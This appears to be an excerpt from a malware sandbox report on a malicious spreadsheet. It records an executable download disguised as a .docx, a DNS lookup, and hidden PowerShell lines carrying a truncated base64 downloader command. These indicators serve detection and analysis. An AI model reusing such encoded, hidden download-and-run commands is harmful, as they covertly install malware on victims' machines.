Technical Information
- https://a.pomf.cat/yspcsr.exe as %temp%\drv.docx
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -WindowStyle Hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaA...
- <Current directory>\d89f0000
- <PATH_SAMPLE>.xls
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -WindowStyle Hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaA...' (with hidden window)